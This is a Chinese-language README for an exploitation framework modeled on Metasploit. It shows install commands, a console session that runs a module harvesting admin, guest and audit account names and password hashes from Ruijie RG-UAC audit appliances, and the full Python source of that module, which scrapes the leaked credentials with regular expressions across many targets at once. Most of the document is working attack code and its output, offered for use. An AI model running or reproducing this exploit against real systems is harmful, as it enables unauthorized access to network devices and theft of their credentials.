漏洞利用框架
需要模块:
- aiohttp
- prettytable
- urllib3
python3.10 -m pip install -r requirements.txt
git clone https://github.com/Amzza0x00/Zerooo-Exploitation-Framework.git
cd Zerooo-Exploitation-Framework
python3 console.py
_ _ _ 1.0.0#dev
_______ _ __ ___ ___ ___ ___ _ __ | | ___ (_) |_
|_ / _ \ r'__/ _ \ / _ \ / _ \/ __| '_ \| |/ _ \| | __|
/ / __/ | | (_) | (_) | (_) \__ \ |_) | | (_) | | |_
/___\___|_| \___/ \___/ \___/|___/ .__/|_|\___/|_|\__|
|_|
Zerooo Exploitation Framework
+ -- --=[ 5 exploits - 4 auxiliary ]
zsf > setg proxy http://127.0.0.1:7890
2021/06/15 16:14:34 [*] proxy => http://127.0.0.1:7890
zsf > use exploit/ruijie/rg-uac-passleak
zsf (rg-uac-passleak) > show options
Module options (exploit/ruijie/rg-uac-passleak):
Name Current Setting Required Description
---- --------------- -------- -----------
targets https://192.168.1.2:3001 yes 目标url,多个目标请用,分开
zsf (rg-uac-passleak) > run
2021/06/12 16:14:49 [*] Running module exploit/ruijie/rg-uac-passleak...
2021/06/12 16:14:49 [*] Current task 1
2021/06/12 16:15:12 [+] name:admin,password:8b6ebdca5ad9f22c64a831f9ab262159
2021/06/12 16:15:12 [+] name:guest,password:fcf41657f02f88137a1bcf068a32c0a3
2021/06/12 16:15:12 [+] name:audit,password:d33542b8458db8cabd9843fe7c1e8784
2021/06/12 16:15:12 [*] exploit complete
zsf (rg-uac-passleak) >
import re
from zerooo.core.asyncpool import async_run # 协程运行
from zerooo.core.log import LOGGER # 颜色输出
from zerooo.core.options import Option # 设置获取exp属性
from zerooo.request.httpclient import HttpClient # 异步http发包
from zerooo.utils.util import get_target # 切分多个目标
# 定义Zerooosploit类,继承Option
class Zerooosploit(Option):
def __init__(self):
super(self.__class__, self).__init__()
self.info = {
'Name': '锐捷RG-UAC统一上网行为管理审计系统存在账号密码信息泄露', # exp名字
'Module': 'exploit/ruijie/rg-uac-passleak', # exp路径
'Product': '锐捷RG-UAC统一上网行为管理审计系统', # 产品
'Cve': '', # cve编号
'Create_date': '20210411', # 创建日期
'Description': '锐捷RG-UAC统一上网行为管理审计系统存在账号密码信息泄露,可以间接获取用户账号密码信息登录后台', # 描述
'Authors': '', # 作者
'References': '' # 参考链接
}
self.option = {
"""
注册exp所需参数
Current Setting 参数默认值, Required 可选/必须, Description 参数描述
OptArgset.urls 使用全局参数
"""
'urls': {'Current Setting': OptArgset.urls, 'Required': 'yes', 'Description': '目标url,多个目标请用,分开'},
'limit': {'Current Setting': None, 'Required': 'no', 'Description': '并发限制(默认根据当前系统自动调整)'}
}
# async def定义异步函数
async def rg_uac_passleak(self, target):
# 请求方式、路径等
resp = await HttpClient().send_request_cgi('GET', url=target)
return resp
# 定义异步回调函数,用于处理结果
def rg_uac_passleak_callback(self, future):
resp = future.result()
if resp:
if resp['code'] == 200:
result = resp['text']
user = re.findall('"name":"(.*?)"', result)
password = re.findall('"password":"(.*?)"', result)
if user:
LOGGER.success(f'存在漏洞 (Find vuln) : {resp["url"]}')
for i in range(len(user)):
msg = f'name:{user[i]},password:{password[i]}'
LOGGER.success(msg)
else:
msg = f'目标不存在漏洞 (The target not find vuln): {resp["url"]}'
LOGGER.info(msg)
else:
msg = f'目标不存在漏洞 (The target not find vuln): {resp["url"]}'
LOGGER.info(msg)
# 运行方法
def exploit(self):
# 调用get_options方法获取参数
urls = self.get_options('urls')
limit = self.get_options('limit')
# async_run 异步调用 arg1 异步对象 arg2 对象参数(只能传一个参数,list类型) arg3 异步回调函数 arg4 并发速率
async_run(self.rg_uac_passleak, urls, self.rg_uac_passleak_callback, limit)
LOGGER.info('运行完成 (exploit complete)')
欢迎issues(请带上logs目录下的日志信息)